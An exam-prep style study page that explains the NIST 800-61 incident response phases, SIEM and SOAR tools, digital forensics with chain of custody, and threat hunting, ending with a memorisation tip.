Incident Response Lifecycle: NIST 800-61 Phases and Tools
Incident response is the structured approach to managing security breaches. The NIST 800-61 framework defines four phases: Preparation, Detection & Analysis, Containment Eradication & Recovery, and Post-Incident Activity.
The NIST 800-61 Incident Response Lifecycle
NIST Special Publication 800-61 (Computer Security Incident Handling Guide) defines the standard framework for incident response. The four phases are:
Preparation — the most critical phase. Establish incident response policies, form the CSIRT (Computer Security Incident Response Team), acquire tools (forensics kits, imaging devices, analysis software), and conduct training and tabletop exercises.
Detection and Analysis — monitor systems for security events, validate whether an event is actually an incident, determine the scope (what systems are affected), assess the impact, and document everything. This is where SIEM tools play a crucial role.
Containment, Eradication, and Recovery — contain the incident to prevent further damage (short-term containment: isolate affected systems; long-term containment: apply temporary fixes), eradicate the root cause (remove malware, patch vulnerabilities, rebuild systems), and recover by restoring systems to normal operation.
Post-Incident Activity (Lessons Learned) — conduct a post-mortem meeting, document what happened and what was learned, update policies and procedures, and create a final incident report.
- Preparation: policies, team, tools, training — do this before any incident
- Detection & Analysis: identify, validate, scope the incident
- Containment/Eradication/Recovery: stop the damage, remove the threat, restore operations
- Post-Incident: lessons learned, documentation, process improvement
SIEM (Security Information and Event Management)
SIEM systems collect, aggregate, and analyze log data from across the enterprise to detect security incidents in real-time. SIEM combines two functions: Security Information Management (SIM — long-term log storage and reporting) and Security Event Management (SEM — real-time monitoring and alerting).
SIEM tools ingest logs from firewalls, servers, endpoints, applications, and network devices. They correlate events across multiple sources to identify patterns that indicate attacks. For example, a SIEM might correlate failed logins across multiple domain controllers with a subsequent successful login from an unusual location — indicating a potential password-spraying attack.
- SIEM = SIM (log storage/reporting) + SEM (real-time monitoring)
- Ingests logs from firewalls, servers, endpoints, apps, network devices
- Correlation: links events across sources to detect attack patterns
- Alerting: triggers notifications based on rules and thresholds
- Common SIEMs: Splunk, ELK Stack, IBM QRadar, Microsoft Sentinel
SOAR (Security Orchestration, Automation, and Response)
SOAR platforms build on SIEM capabilities by automating incident response actions. SOAR can automatically: enrich alerts with threat intelligence, run playbooks (predefined response workflows), open tickets in ITSM systems, block indicators on firewalls, and quarantine endpoints.
While SIEM detects incidents, SOAR responds to them. SOAR reduces mean time to respond (MTTR) by automating repetitive analysis and response tasks, allowing human analysts to focus on complex investigations.
- SOAR automates response actions based on SIEM alerts
- Orchestration: connects security tools to work together
- Playbooks: predefined automated response workflows
- Reduces MTTR (Mean Time to Respond)
- SOAR is not a replacement for SIEM — it complements it
Digital Forensics and Chain of Custody
Digital forensics is the process of collecting, preserving, analyzing, and presenting digital evidence. The forensic process must maintain the integrity of evidence for potential legal proceedings.
Chain of Custody is the documented history of evidence — who collected it, when, where, how it was handled, and who had access. Every transfer must be documented. Break the chain and the evidence may be inadmissible in court.
Forensic principles: never work on the original data (always create a forensic image), use write blockers to prevent modifying evidence, document every action, and maintain integrity through hashing (verify the forensic image matches the original).
- Digital forensics: collect, preserve, analyze, present evidence
- Chain of custody: document every person who handles evidence
- Always work from a forensic image, never the original
- Hash verification (SHA-256) ensures evidence hasn't been tampered with
- Write blockers prevent accidental modification during acquisition
Threat Hunting
Threat hunting is the proactive search for threats that evaded existing security controls. Unlike incident response (which reacts to alerts), threat hunting assumes a breach has already occurred and actively looks for indicators.
The threat hunting process: (1) Create a hypothesis based on threat intelligence or known TTPs, (2) Collect and analyze data from logs, network traffic, and endpoints, (3) Investigate suspicious findings, (4) Respond if a threat is confirmed. The results improve detection rules and reduce future dwell time.
- Proactive — hunts for threats that evaded existing controls
- Hypothesis-driven: based on threat intelligence, TTPs, or anomalies
- Reduces dwell time (time between compromise and detection)
- Feeds back into detection rule improvements
Exam Tip
Memorize the four NIST phases in order: Preparation → Detection & Analysis → Containment/Eradication/Recovery → Post-Incident. Know SIEM detects, SOAR responds. Chain of custody is critical for evidence admissibility.